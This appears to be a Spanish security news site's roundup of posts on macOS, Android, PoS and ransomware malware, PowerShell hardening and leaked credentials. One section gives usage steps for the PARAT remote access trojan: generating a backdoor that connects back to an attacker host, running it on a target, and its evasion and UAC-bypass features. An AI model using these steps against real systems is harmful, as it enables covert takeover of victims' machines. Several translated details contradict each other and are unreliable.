NUEVO COLDROOT MALWARE QUE REALIZA UN KEYLOGGING EN SISTEMAS DE MAC

Esta vez el nuevo malware se dirige a macOS y viene con capacidades de keylogging. Los investigadores de seguridad cibernética han descubierto un nuevo malware llamado Coldroot que no ha sido detectado por los programas de antivirus ya que solo 18 de las 20 herramientas pudieron detectarlo. Este malware Mac es un troyano de acceso aleatorio, RAT por sus siglas en ingles, que se compartió en línea en Github en 2016.

Coldroot ahora es capaz de afectar a todos los sistemas operativos y puede obtener de forma silenciosa control remoto en una computadora vulnerable. Los detalles de Coldroot fueron revelados públicamente por un investigador de seguridad de datos y jefe de la investigación, Patrick Wardle.

Wardle identificó que era un malware de “característica completa, actualmente no detectada” y que estaba siendo vendido por su sospechoso autor Coldzer0 en la Dark Web desde el 1 de enero de 2017. También, Coldzer0 publicó un video que muestra que Coldroot RAT multiplataforma se puede utilizar para apuntar a MacOS, Linux y sistemas basados ​​en Windows. Coldzer0 también ofrecía a los clientes información sobre los métodos de personalización de malware.

El malware se identificó en un controlador de audio ilegítimo de Apple llamado “com.apple.audio.driver2.app”. Este se muestra como un documento y solicita acceso de administrador, luego se instala silenciosamente y se comunica con su servidor de C & C para obtener instrucciones. Una vez que el usuario hace clic en él, aparece un mensaje emergente que parece un mensaje de autenticación normal. Solicita las credenciales de MacOS del usuario. Cuando se proporcionan, Coldroot modifica la base de datos de privacidad de TCC.db, lo que permite que el malware tenga acceso para realizar un keylogging en el sistema.

El malware se las arregla para permanecer en el sistema infectado instalándose como un demonio de lanzamiento. Asimismo, el código se inicia automáticamente cada vez que se enciende la computadora infectada.

El malware es capaz de realizar capturas de pantalla, iniciar y finalizar procesos, buscar y cargar  archivos, iniciar una sesión de escritorio remoto y apagar el sistema operativo de forma remota. No está claro si la versión reciente de Coldroot es la misma que se cargó hace dos años o si es una versión modificada de ese malware.

El experto en seguridad cibernética afirmó que es posible que el malware no pueda afectar a los sistemas operativos más nuevos, como MacOS High Sierra, porque el TCC.db del sistema está protegido a través de la Protección de Integridad del Sistema (SIP). Ahora lo mejor para mantenerse protegidos, es cambiar a la última versión del sistema operativo.

Read More

QUÉ ES CRYPTOJACKING Y CÓMO EVITAR ESTE ATAQUE

En este artículo trataremos de dar una explicación simple y fácil de seguir de por qué todo el mundo habla de esto y por qué también debería actualizar su seguridad de datos.

En pocas palabras, ahora los hackers pueden robar su dinero y su información, mientras aumentan su factura de energía y posiblemente destruyan el hardware de su computadora.

Primero debemos saber lo que es Blockchain, es el principio básico de Bitcoin y la mayoría de las otras criptomonedas.

Blockchain, resolvió un desafío muy grande. Un archivo digital puede ser copiado, modificado o falsificado. Si bien no se puede obtener una factura directamente de un proveedor  y dársela a su amigo, se puede copiar una factura digital para que dos personas puedan gastar esa factura exacta, explica un experto en seguridad cibernética.

También había otro problema, para verificar que la factura era original y no una copia o una falsificación, necesitabas que alguien realmente verificara. Al poner esto en manos de un tercero, los usuarios quedan expuestos a muchos riesgos.

El protocolo Blockchain elimina al intermediario al hacer que todos sean participantes activos en la transacción. Nuestro especialista en seguridad de datos nos dice que con Blockchain, cada vez que alguien realiza una transacción, esa transacción se registra en un bloque para que permanezca permanentemente disponible. A medida que más y más personas envían dinero, se crean cada vez más bloques y se vinculan entre sí en la cadena. Si alguien quisiera hackear  una transacción o duplicarla, tendría que atacar toda la cadena de bloques.

Las personas o máquinas que vinculan estas transacciones se llaman mineros. A cambio de una pequeña tarifa, vinculan las transacciones y crean los bloques que se agregarán a la cadena. En algunos casos, hay computadoras especiales diseñadas específicamente para minar criptomonedas, llamadas ASIC.

En el pasado, los hackers  intentaron robar la información de su tarjeta de crédito para que pudieran usar su dinero. Ahora, los hackers pueden robar los recursos de su computadora para crear dinero.

Con Bitcoin, el robo es posible. Sin embargo, el proceso de minería de Bitcoin ahora requiere demasiados recursos para las configuraciones regulares y se realiza en hardware especializado.

Con Monero, robar es extremadamente fácil. Porque se puede hacer en una computadora común. Monero también es anónimo e imposible de rastrear. Incluso si las autoridades estuvieran dispuestas a ayudarlo en caso de un ataque, Monero les hace casi imposible identificar a los autores, de acuerdo a un especialista en seguridad cibernética.

Ahora hay que saber que es CoinHive, es un minero de Monero que usa Javascript, el lenguaje de programación más popular. Este código se puede incrustar en cualquier página web. Una vez que accede a esa página, utiliza el procesador de su computadora para extraer Monero.

Los hackers pueden dirigirse a los sitios web que visitas e implementar el script de CoinHive. Le ha sucedido a miles de sitios web, desde pizzerías, blogs, organizaciones de salud y páginas gubernamentales.

Tal ataque se llama cryptojacking, que es un “secuestro de criptomonedas”. Se roba el poder de procesamiento de la computadora para crear criptomonedas y obtener ganancias rápidas e imposibles de rastrear. Básicamente, convierte su PC o dispositivo en un minero de Monero. La secuencia de comandos de CoinHive puede usar el 100% de la potencia de la CPU del visitante y, por lo tanto, reducir la vida útil del hardware.

Investigadores de seguridad de datos nos dan algunas medidas de seguridad que ayudan a evitar estos ataques.

Protege siempre tu computadora con un antivirus, aunque el malware moderno puede escapar de él. También necesita una solución antimalware para detectar las amenazas antes de que lleguen a su PC.

En cualquier navegador, tanto en escritorio como en dispositivos móviles, use un bloqueador de anuncios. Actualice siempre su software, porque la mayoría de los ataques se llevan a cabo debido a vulnerabilidades sin parches.

Siempre use contraseñas seguras o un administrador de contraseñas seguro para que, en caso de un ataque, su información personal no se vea comprometida.

Read More

BLOQUEAR POWERSHELL PARA DETENER ATAQUES

El lenguaje de scripting de fuente abierta, es la herramienta de movimiento lateral perfecta para los atacantes una vez que han comprometido una red. Y los scripts de PowerShell pueden ejecutarse solo en la memoria, dando lugar al término malware “sin archivos”.

“El lenguaje de scripting PowerShell de Microsoft, es extremadamente popular entre los administradores de TI. Pero los hackers también lo están tomando cada vez más”, comenta un experto en seguridad cibernética, “los scripts maliciosos de PowerShell pueden ser difíciles de detectar y aun más difíciles de investigar porque dejan pocos rastros forenses”.

“PowerShell es tan poderoso y versátil en el sentido de que tiene acceso al framework .NET, acceso a WMI, acceso a prácticamente cualquier parte de la máquina”, dice Arafeh, refiriéndose a Windows Management Instrumentation, la infraestructura para datos de gestión y operaciones en sistemas operativos basados ​en Windows.

Microsoft ha estado trabajando en una variedad de tecnologías de seguridad de datos que ayudan a los administradores a detener el abuso de PowerShell, presenta tres herramientas esenciales para ayudar a prevenir estos ataques. El objetivo es reducir la capacidad de los atacantes de doblar las herramientas legítimas para fines maliciosos.

Modo de lenguaje restringido

Los administradores pueden establecer la función de idioma restringido de PowerShell, que corta las acciones potencialmente peligrosas, como invocar API de Windows arbitrarias. Pero eso no impide que los atacantes inicien otra instancia de PowerShell con todas las capacidades de idioma.

La solución de Microsoft es que el modo de idioma restringido se use con un software de control de aplicaciones. De esta forma, cuando PowerShell detecta una política UMCI, permanecerá en modo de idioma restringido.

“Estas políticas de bloqueo son importantes para los sistemas de alto valor que deben protegerse contra administradores maliciosos o credenciales de administrador comprometidas”, según una publicación de Microsoft. “Con una política aplicada, incluso los administradores están limitados a lo que pueden hacer en el sistema.”

Registro profundo

La función registrará todas las secuencias de comandos de bloques que procesa PowerShell, incluidas aquellas que emplean la generación de código dinámico, que puede ser un intento de evadir la detección.

De manera predeterminada, PowerShell graba bloques de script la primera vez que se usa uno, pero se puede configurar para que se grabe cada vez que se ejecute el mismo. Eso puede conducir a un registro voluminoso de eventos, por lo que has sido advertido. Pero los registros posteriores podrían proporcionar cierto alcance en torno a lo que intentaban hacer los atacantes.

Un profesional de seguridad cibernética nos dice que; la mayoría de las empresas solo se dan cuenta de la necesidad de habilitar el registro de secuencias de comandos después de que sea demasiado tarde, pero, PowerShell registra automáticamente bloques de scripts cuando tienen contenido utilizado a menudo por scripts maliciosos. Este registro de bloques de scripts automáticos no tiene como objetivo reemplazar el registro de bloqueo de scripts o antivirus, solo sirve como un último recurso.

Interfaz de exploración Anti-Malware

En Windows 10, Microsoft agregó una función de seguridad de datos llamada Interfaz de escaneo anti-malware, o AMSI, que tiene la intención de ayudar a desenrollar y analizar las secuencias de comandos enmascaradas o cifradas.

Codificar los guiones es una de las formas en que los atacantes esperan que su código no sea atrapado. Pero al final de la línea, las secuencias de comandos ofuscadas deben desenredarse para que se ejecuten en el motor de scripts.

Las aplicaciones pueden llamar a la API de AMSI para verificar el script de PowerShell. Proveedores de antivirus también aprovechan AMSI, Microsoft lo usa en varios productos, incluyendo Windows Defender AV y Windows Defender EDR, es una herramienta de seguridad de datos posterior a la explotación para explorar ataques que inicialmente no fueron detectados.

“Mientras el anti-malware pueda usar AMSI para mirar el contenido del script, entonces usted tiene la capacidad de aprender sobre lo que está haciendo el script y bloquear cualquier comportamiento malicioso”, dice Arafeh.

Read More

NUEVO RANSOMWARE BASADO EN LAS PELÍCULAS DE TERROR ANNABELLE

Un nuevo ransomware basado en las películas de terror Annabelle. Descubierto por un investigador de seguridad cibernética. Annabelle Ransomware, incluye terminar numerosos programas de seguridad, deshabilitar Windows Defender, apagar el firewall, encriptar archivos, tratar de propagar a través de unidades USB, hacerlo para que no pueda ejecutar una variedad de programas, y luego sobrescribe el registro maestro de arranque de la computadora infectada con un cargador de arranque.

Un grupo de investigadores de seguridad de datos, fue capaz de extraer el código fuente del ejecutable lo que ayuda a entender lo que hace este programa.

Cuando se ejecute por primera vez, Annabelle se configurará para iniciarse automáticamente cuando inicie sesión en Windows. Luego finaliza una variedad de programas como Process Hacker, Process Explorer, Msconfig, Task Manager, Chrome y más.

Posteriormente, configura las entradas de registro de Ejecución de archivos de imagen para que no pueda iniciar una variedad de programas como los enumerados anteriormente y otros como Notepad ++, Bloc de notas, Internet Explorer, Chrome, Opera, bcdedit y muchos más.

El ransomware intentará expandirse utilizando archivos autoru.inf.  Un experto en seguridad cibernética nos dice que este método es bastante inútil cuando se trata de versiones más nuevas de Windows que no admiten una función de reproducción automática.

Después, comenzará a encriptar la computadora con una clave estática. Al encriptar archivos, agregará la extensión .ANNABELLE al nombre del archivo encriptado.

Luego reiniciará la computadora y cuando el usuario inicie sesión, se mostrará la pantalla de bloqueo. La pantalla de bloqueo tiene un botón de créditos que, al hacer clic, muestra la pantalla a continuación que indica que un desarrollador llamado iCoreX0812 creó el programa y una forma de contactarlos en Discord.

Como toque final, el desarrollador decidió ejecutar también un programa que reemplaza el registro de inicio maestro de la computadora infectada para que muestre una pantalla de “accesorios” cuando la computadora se reinicia.

Un especialista en seguridad cibernética comento que, en general este ransomware fue desarrollado para ser un PITA y para mostrar las habilidades del desarrollador en lugar de generar realmente pagos de rescate.

Este ransomware se basa en Stupid Ransomware y es fácilmente descifrable. Como utiliza una clave estática, se puede actualizar su StupidDecryptor para descifrar esta variante.

Al reemplazar el MBR, ejecutar Rkill en modo seguro para limpiar las entradas de registro de IFEO, usar StupidDecryptor para descifrar los archivos y luego algunos escaneos de seguridad de datos para eliminar los remanentes, debería poder hacer que su computadora vuelva a la normalidad.

Read More

COMO USAR PARAT- REMOTE ACCESS TROJAN (RAT)?

De acuerdo con especialistas en seguridad informática; un Troyano de Acceso Remoto (RAT) es un tipo de malware que controla un sistema a través de una conexión de red remota como por acceso físico. Si bien el uso compartido de escritorio y la administración remota tienen muchos usos legales, RAT generalmente se asocia con actividad criminal. Una RAT se instala sin que la víctima lo sepa y tratará de ocultar su operación a la víctima y al software de Anti Virus.

PARAT es una herramienta de administración remota basada en Python y socket abierto con múltiples hilos. Utiliza principalmente Python core y usa IPv4 para comunicación y autocifrado local y remoto para su privacidad.

PARAT tiene dos intérpretes:

• Modo local
• Modo remoto

Cuando inicias el PARAT usando Python2 main.py, te redirigen al modo local y allí puedes:

Controlar opciones locales, cambiar elementos de UI, hacer ediciones, usar shell unix, establecer puertos de escucha y generar una puerta trasera, por mencionar algunos, no debemos olvidar que algunos comandos locales están disponibles en modo remoto.

Puede acceder al modo remoto solo cuando tiene conexiones conectadas, usando session -c ID reemplazando el ID con un identificador de objetivos. Aquí el experto en seguridad cibernética, tiene acceso completo a la máquina de destino y también puede realizar acciones remotas.

También puede establecer la contraseña local para el cliente PARAT y las conexiones remotas usar el algoritmo de cifrado automáticamente.

Aunque existen diferentes y mejores opciones para manejar la multiplicidad, deciden usar el módulo de enhebrado para hacer esto. La razón de esta elección es que PARAT es una herramienta simple y diseñada solo para fines educativos. Dejan de usar instrumentos más sofisticados en ese aspecto. También es necesario señalar que puede escuchar puertos diferentes al mismo tiempo utilizando esta función.

Solo haz estos pasos:

Entran al menú principal de PARAT usando Python2 main.py

Hacer que el uso de la puerta trasera genere -i yourhost.ddns.net -p 4444 -o backdoor.pyw

Ejecutar backdoor.pyw en el objetivo

Jugar con el objetivo en modo remoto, usando sesiones -c 1

También escucha en el puerto usando listen -p your_port

Change log:

Compatible con las versiones de Python 2 y 3 Copie y pegue en su terminal:

git clone https://github.com/micle-fm/Parat&& cd Parat && python main.py

Puede necesitar instalar python -m easy_install pypiwin32 en algunos destinos.

Características

Totalmente indetectable (FUD)

Compatible con Telegram Messenger

Windows Bypass Control de cuenta de usuario (UAC)

Ejecución de memoria

No hay requisitos para configurar

Telegram

Puede comunicar PARAT usando telegram messanger. Para esto haz los pasos:

Abra el archivo telegram.service en un editor

Inserta tu token de bot en la línea 15, reemplazado en YOUR_BOT_TOKEN

Ejecute telegram.service escribiendo: python telegram.service

Read More

NUEVA VARIANTE DE ANDRORAT CON MEJORES HABILIDADES DE ROBO

Una vulnerabilidad parchada se utiliza para atacar los sistemas Android con una Herramienta de Acceso Remoto (RAT por sus siglas en ingles).

Los estudios realizados por expertos en seguridad informática han detectado una nueva variante de AndroRAT, que puede inyectar root exploits, lo que permite a los atacantes acceder al dispositivo. AndroRAT aprovecha el CVE-2015-1805, que se hizo público y parcheó en 2016, y solo afecta a los dispositivos Android anteriores.

Profesionales en seguridad cibernética comentan que AndroRat se creó en 2012 como un proyecto universitario para permitir el acceso remoto a dispositivos Android, pero los hackers  también encontraron otro uso para él.

Los especialistas en seguridad informática explican que la nueva variante pretende ser una aplicación de utilidades llamada TrashCleaner, que probablemente se distribuye a través de una URL maliciosa.

La primera vez que AndroRAT se ejecuta, instala una aplicación de calculadora etiquetada en chino que se parece al que normalmente viene incluido con cualquier dispositivo Android. El icono de la calculadora suplanta el ícono del TrashCleaner. El malware se puede controlar de forma remota, de a cuerdo a los informes de los expertos en seguridad cibernética.

Algunos de los nuevos bits de robo incluyen; robo de información de la red móvil, capacidad de almacenamiento, aplicaciones instaladas, historial de navegación web de los navegadores pre instalados, calendario de eventos, registro de llamadas, subir archivos al dispositivo víctima, utilizar la cámara frontal, borrar y enviar SMS, captura de pantalla, ejecución de comandos shell y contraseñas de Wi-Fi.

Read More

HACKERS EXPLOTAN ERROR ZERO-DAY DE TELEGRAM MESSENGER

Se descubrió una vulnerabilidad de Zero-Day en la versión de escritorio de la aplicación de Telegram encriptada de extremo a extremo, esta se estaba explotando para propagar un malware que minaba criptomonedas como Monero y ZCash.

La vulnerabilidad de Telegram fue descubierta por el investigador de seguridad informática  Alexey Firsh en octubre pasado, esto afecto solo usuarios de Windows.

La falla ha sido explotada desde marzo de 2017 por atacantes que engañaron a las víctimas para descargar software malicioso en sus computadoras que usan para obtener mayor poder de CPU para extraer criptomonedas o servir como puerta trasera para que los hackers controlen remotamente la máquina afectada, de acuerdo a una investigación realizada por una empresa de seguridad cibernética.

Durante el análisis, los expertos en seguridad informática encontraron escenarios de explotación de Zero-Day por parte de los hackers.

Principalmente la falla fue explotada para entregar un malware de minería de criptomonedas, que usa la potencia de cómputo de PC de la víctima para extraer distintos tipos de criptomonedas.

Al analizar los servidores de los hackers, los investigadores también encontraron archivos que contenían un caché local de Telegram que había sido robado a las víctimas.

Los profesionales en seguridad cibernética también encontraron, que los hackers explotaron con éxito la vulnerabilidad para instalar un troyano de puerta trasera que usaba la interfaz de programación de la aplicación (API) de Telegram como un protocolo de comando y control, lo que permitía a los hackers obtener acceso remoto a la computadora de la víctima.

“Después de la instalación, comenzó a funcionar en modo silencioso, lo que permitió que el hacker permaneciera desapercibido en la red y ejecutara diferentes comandos, incluida la instalación adicional de herramientas de spyware”, agregó la empresa de seguridad informática.

En primera instancia se cree que la vulnerabilidad  Zero-Day fue explotada solo por hackers rusos, dado que un colaborador de la empresa de seguridad cibernética dijo que  “…todos los casos de explotación que se detectaron ocurrían en Rusia”.

El Instituto Internacional de Seguridad Cibernética dijo que la mejor manera de protegerse de tales ataques no es descargar o abrir archivos de fuentes desconocidas o no confiables, también recomendó a los usuarios evitar compartir información personal confidencial en las aplicaciones de mensajería y asegurarse de tener un buen software antivirus de una compañía confiable instalada en sus sistemas.

Read More

CONSEJOS PARA PROTEGER TU IPHONE DE HACKERS

Creemos que nuestro iPhone  hackeado es algo que no puede suceder, pero las grandes compañías pagan grandes sumas de dinero a los expertos en seguridad informática para encontrar los errores y las lagunas. Si bien no vale la pena entrar en pánico, es bueno tomar precauciones. Por supuesto que alguien puede hackear tu iPhone. Pero puedes hacer mucho para proteger tu iPhone y protegerlo de posibles hackers. El Instituto Internacional de Seguridad Cibernética da consejos para implementar la mayor seguridad informática posible.

Actualizar tu iPhone a la última versión

La actualización de los dispositivos iOS al último software es la mejor manera de asegurarse de que sus dispositivos estén lo más protegidos posible de los hackers. Con cada actualización, Apple mejora las funciones de seguridad informática y soluciona los puntos débiles.

Habilitar la autenticación de dos factores

Cuando la Autenticación de Dos Factores está habilitada, debe usar un dispositivo confiable para iniciar sesión en un nuevo dispositivo.

Activar Buscar mi iPhone

Esto es obvio. Cuando está activada Buscar mi iPhone, puede ver la ubicación de sus dispositivos desde cualquiera de sus dispositivos o desde cualquier computadora a través de iCloud.

Cambiar a un código de acceso de seis dígitos

Si bien puede parecer un inconveniente agregar dos dígitos adicionales a su contraseña, vale la pena la seguridad adicional.

Configure su teléfono para autodestruirse

No realmente, pero lo suficientemente cerca. Puede activar una configuración que borrará su dispositivo después de diez intentos fallidos de código de acceso.

Sea inteligente al abrir mensajes y correos electrónicos

Una gran forma que muchos hackers obtendrán de la información de su iPhone de forma remota es a través de enlaces de malware y correos electrónicos fraudulentos.

Cambie su contraseña de ID de Apple regularmente

Cambiar la contraseña de su ID de Apple regularmente es la mejor manera de asegurarse de que nadie acceda sin su permiso. Recomiendan empresas de seguridad informática crear una nueva contraseña de Apple ID cada seis meses.

Usar solo estaciones de carga confiables

Si estás en un aprieto y necesitas usar un espacio público de carga, solo asegúrate de que sea legítimo y no solo un cargador aleatorio que aparezca allí.

Read More

ENCUENTRAN MALWARE QUE SE OCULTA COMO TRÁFICO DNS PARA AFECTAR A LOS SISTEMAS POS

Se han encontrado una nueva variedad de malware de punto de venta conocida como PoS, por sus siglas en ingles. Expertos del Instituto Internacional de Seguridad Cibernética, comentaron que este malware se disfraza como un paquete de servicio de LogMeIn para ocultar el robo de datos de clientes.

La semana pasada, los investigadores en seguridad informática, Robert Neumann y Luke Somerville dijeron en una publicación que una nueva familia de malware, denominada UDPoS, intenta disfrazarse como servicios legítimos para evitar la detección al transferir datos robados.

En una muestra del malware descubierto recientemente por una firma de seguridad informática, se noto que este se disfraza como una función de LogMeIn, este es un sistema de acceso remoto legítimo que se usa para administrar computadoras y otros sistemas de forma remota.

Este paquete de servicios falso generó cantidades notables de solicitudes inusuales de DNS, según el equipo y tras una investigación adicional, se descubrió que el sistema falso de LogMein era en realidad malware PoS.

El malware PoS acecha en los sistemas de seguridad informática donde la información de la tarjeta de crédito se procesa y se almacena potencialmente, como en tiendas y restaurantes. Si un sistema de punto de venta está infectado, malware como DEXTER o BlackPOS robará los datos de la tarjeta contenidos en la banda magnética de la tarjeta de crédito, antes de enviar esta información a su operador a través de un servidor de comando y control (C & C).

La información robada se puede usar para crear tarjetas de duplicación de bancos, borrar cuentas bancarias y, posiblemente, también para robo de identidad.

Apenas en 2013, la empresa estadounidense Target fue víctima de malware PoS y con esto fue robada la información de la tarjeta de crédito de aproximadamente 110 millones de clientes.

En lo que las empresas de seguridad informática como WebImprints llaman algo inusual, el nuevo malware UDPoS utiliza nombres de archivos con temática de LogMein y URL de C & C para ocultar su tráfico basado en DNS.

En las pruebas realizadas a la muestra tomada del malware, logmeinumon.exe, se puede ver que este se enlaza con un servidor de C & C alojado en Suiza y contiene un cuentagotas y archivos autoextraíbles que extrae el contenido de los directorios temporales.

A su vez, se crea un directorio LogMeInUpdService junto con un servicio del sistema para habilitar la persistencia, y luego entra en juego un componente de monitoreo.

“Este componente de monitoreo tiene una estructura casi idéntica al componente de servicio”, dicen los expertos en seguridad informática. “Es compilado por la misma versión de Visual Studio y utiliza la misma técnica de codificación de cadenas: ambos contienen solo unas pocas cadenas de texto plano identificables, y en su lugar usan un cifrado básico y un método de codificación para ocultar cadenas como el servidor C2, nombres de archivos y nombres de proceso codificados “.

Toda la información obtenida, como la información de la tarjeta del cliente, luego se recopila y se envía a través del tráfico del DNS disfrazado como LogMein.

“Casi todas las empresas tienen firewalls y otras protecciones para monitorear y filtrar las comunicaciones basadas en TCP y UDP, sin embargo, a menudo se sigue tratando el DNS de manera diferente brindando una oportunidad de oro para filtrar datos”, señalan colaboradores de una firma de seguridad informática.

Compañías especializadas en seguridad informática, enfatizan que el uso de los temas de LogMein es simplemente una forma de camuflar las actividades del malware, y después de revelar los hallazgos a la empresa de software remoto, no se ha encontrado evidencia de abuso del producto o servicio.

Aun no se tienen pruebas de si este malware se usa o no en la naturaleza, pero la compilación del malware fue el 25 de octubre de 2017, por lo que esta puede ser una campaña nueva.

Por otro lado, los investigadores en seguridad informática dicen que hay evidencia de una “variante anterior con temas de Intel”, que sugiere que UDPoS puede ser la próxima evolución en malware operacional que ha sido modificado para ser más exitoso y enfocarse en nuevas víctimas.

Por su parte, LogMein dio una declaración:

“LogMeIn no proporciona este enlace, archivo o archivo ejecutable, y las actualizaciones de los productos de LogMeIn, incluidos los parches, las actualizaciones, etc., siempre se entregarán de forma segura dentro del producto.

Nunca nos contactaremos con una solicitud para actualizar su software que también incluye un archivo adjunto o un enlace a una nueva versión o actualización”.

Read More

MILLONES DE CREDENCIALES DE FORTUNE 500, FUERON ENCONTRADAS EN LA DEEP WEB.

Alrededor del  10 por ciento de las credenciales de correo electrónico de todos los empleados en las compañías Fortune 500 se han filtrado en la deep web, según un nuevo estudio del Instituto Internacional de Seguridad Cibernética

El reporte de VeriCloud  incluye, información de un periodo de 3 años, que analizó a 27 millones de empleados de Fortune 500 y encontró aproximadamente 2,7 millones de credenciales entre los ocho mil millones de credenciales robadas que se encuentran en la Deep Web. Si eso no es lo suficientemente malo. VeriCloud encontró que la información robada fue encontrada en múltiples eso incremento la posibilidad de que los agentes malintencionados los compraran y los utilizaran. La buena noticia es que el número representa un descenso del 7,5 por ciento con respecto a 2016.

Vemos que, en promedio, cada dirección de correo electrónico filtrada de Fortune 500, asociada a una cuenta en línea, se encuentra en 2.3 fuentes de datos filtradas. Además, la disponibilidad de datos de credenciales aumenta cuando muchos actores malos vuelven a empaquetar o combinan datos de incumplimiento más antiguos y lo revenden “, afirmó el informe de seguridad informática.

Según la empresa de seguridad informática WebImprints, la disponibilidad de estas contraseñas abre una corporación a una gran cantidad de ciberataques potenciales, que incluyen ataques de asalto, rellenado de credenciales y ataques de adquisición de cuentas, lo que puede llevar a que los delincuentes tengan acceso directo al personal o a las redes corporativas.

Los trabajadores en los sectores de telecomunicaciones, industria y energía vieron el mayor porcentaje de credenciales robadas debido a este fallo en la seguridad informática  con un 23 por ciento, 18 por ciento y 17 por ciento, respectivamente, filtrados. Los campos financiero, tecnológico y salud tienen más registros en la Deep Web, pero esto se debe principalmente al hecho de que esas industrias tienen más empleados en general.

En muchos casos, la empresa Fortune 500 no tiene la culpa directa de la pérdida de datos porque sus empleados utilizaron su dirección de correo electrónico corporativo, y posiblemente las mismas credenciales de inicio de sesión, para crear una cuenta en un sitio web de un tercero. Si esta entidad sufre una infracción y la persona utiliza el mismo nombre de usuario, entonces la compañía Fortune 500 podría ser vulnerable.

El problema se agrava con la gran cantidad de contraseñas débiles asociadas con sus cuentas.

“Las computadoras, la industria de equipos de oficina tiene el mayor porcentaje de contraseñas débiles y comprometidas con un 25 por ciento, seguidas por las industrias de equipos de transporte y telecomunicaciones con un 17,6 por ciento y un 12,9 por ciento, respectivamente”, dijo el informe.

Cuando se trata de volumen de corte, los bancos comerciales tienen la mayor cantidad de contraseñas débiles o comprometidas con 109,000; telecomunicaciones es el siguiente con un poco más de 100.000; y la computadora, el sector de equipos de oficina es el tercero con 73,000.

Read More